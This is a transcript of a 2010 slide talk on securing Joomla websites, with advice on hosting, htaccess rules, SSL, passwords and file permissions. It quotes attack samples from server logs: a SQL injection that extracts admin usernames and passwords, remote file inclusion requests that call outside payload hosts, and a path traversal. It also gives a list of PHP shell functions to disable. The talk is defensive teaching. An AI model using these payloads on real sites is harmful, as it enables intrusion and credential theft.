Security talk: Fortifying your Joomla! website

Security talk: Fortifying your Joomla! Website http://dilbert.com/strips/comic/2004-01-11/ Radek Suski http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html

Where to start?
Long before you go on-line
Choose the right hosting
Choose the right components
Inform yourself about good practices ....
.... it means:
You're right here :)
Copyright 2010, Sigsiu.NET GmbH

Choose the right host
Apache 2
PHP 5
MySQL 5
htaccess support
Safe Mode Off !!!
Register Globals Off !!!
Access via SFTP
HTTPS/SSL support

Choose right components
Components published at JED http://extensions.joomla.org/ Check Vulnerable Extensions List regularly http://docs.joomla.org/Vulnerable_Extensions_List

The point is: be unconventional!
Default username is “Admin”
User ID of the first super admin is 62
index.php?option=com_vulnurable... &id=-1+UNION+ALL+SELECT+username,password+FROM+ jos_users +WHERE+ id=62 ... Copyright 2010, Sigsiu.NET GmbH

Main problem
we have to deal with kids with too much time
“ A scriptkiddie, usually a teenager, is a person of limited technical proficiency who wants to gain control of your system. But, by using a single tool and a system exploit can cause you a great deal of grief” - source Copyright 2010, Sigsiu.NET GmbH

Scriptkiddies
Are sometimes randomly successful
Are ambitious
In most cases causing “only” heavy load:
Default Joomla! Site:
( ~23 SQL Queries executed + ~15 MB Memory used + ~ 170.000 PHP Instructions ) x
Scriptkiddies up to 100 hack attempts in a minute Copyright 2010, Sigsiu.NET GmbH

htaccess – powerful weapon .htaccess - (hypertext access) is the default name of a directory-level configuration file that allows for decentralized management of web server configuration. http://en.wikipedia.org/wiki/Htaccess Copyright 2010, Sigsiu.NET GmbH

Prevent access to PHP files 195.XXX.XX.XX - - [15/May/2005:17:06:00 +0200] "GET / /administrator/components/com_remository/admin.remository.php ?mosConfig.absolute.path=http://xxxx.yy/id1.txt? HTTP/1.1" 404 95 "Mozilla/5.0" Copyright 2010, Sigsiu.NET GmbH

Forbid access from “dangerous” UA GET /?option=com_xxx&controller=../../../../../../../proc/self/environ%00 HTTP/1.1" 403 1043 " libwww-perl /5.829 GET /index.php?option=http://xxxx.go.th/Mail.txt? HTTP/1.1" 403 1029 "Mozilla/3.0 (compatible; Indy Library ) GET /index.php?topic=http://xxx.ru/images/cs.txt? HTTP/1.1" 403 1029 " Wget /1.1 (compatible; i486; Linux; RedHat7.3) Copyright 2010, Sigsiu.NET GmbH

Prevent most common SQL-Injections 2274.xxx.com - - [30/Apr/2008:15:38:47 +0200] "GET /index.php?option=com_xxxx &id=1/**/ union /**/ select /**/1, concat (username,0x3a,password)... Copyright 2010, Sigsiu.NET GmbH

Disclose as little information as possible

Admin Panel Log-In & FTP

HTTPS/SSL & SFTP
Use SFTP instead of FTP
Use HTTPS for log-in

HTTPS/SSL & SFTP - Problems
Provider have to offer SSH/SFTP
Provider have to offer SSL or SSL-Proxy
Invalid SSL-Cert throws error in browser
Valid SSL-Certificates are expensive

HTTPS/SSL - Problems
Valid SSL-Certificates are expensive
https://www.startssl.com/ Copyright 2010, Sigsiu.NET GmbH

Username & Password
Username is almost so important as password
… once again Copyright 2010, Sigsiu.NET GmbH

Username & Password
Automatic generated password: k5dRGCUxGs
… once again Copyright 2010, Sigsiu.NET GmbH

Username & Password
If we can articulate something, we can remember it
… once again https://pass.sigsiu.net/ Copyright 2010, Sigsiu.NET GmbH

File permissions
Very unlucky number: 777

php.ini
Disable “dangerous” functions ??!! disable_functions = system, shell_exec, passthru, exec, phpinfo, popen, proc_open
how can a function be dangerous ??
Use open_basedir
open_basedir = /path/to/www

Is your computer safe?
“ There is no point in following all the best Joomla! security advice you can find if you don't take the simple step of securing your own personal computer with up to date anti-virus software.” Brian Teeman

But what if .... ?
Backup, Backup, Backup ..... and one more time: Backup

Thank you for your attention! http://www.Sigsiu.NET https://shop.Sigsiu.NET http://joomla.Sigsiu.NET http://www.sigsiu.net/presentations/fortifying_your_joomla_website.html Copyright 2010, Sigsiu.NET GmbH

http://www.sigsiu.net	890
http://www.slideshare.net	59
http://www.templates4all.de	29
http://sigsiu.net	15
https://si0.twimg.com	4
http://groundzero08.blogspot.com	3
http://kanto-programmers.blogspot.com	2
http://us-w1.rockmelt.com	2
http://translate.googleusercontent.com	1
http://static.slidesharecdn.com	1
http://webcache.googleusercontent.com	1
https://www.sigsiu.net	1

Security talk: Fortifying your Joomla! website

by Sigsiu.NET on Jun 02, 2010

Accessibility

Categories

Tags

Upload Details

Usage Rights

12 Embeds 1,008

Statistics

Security talk: Fortifying your Joomla! website — Presentation Transcript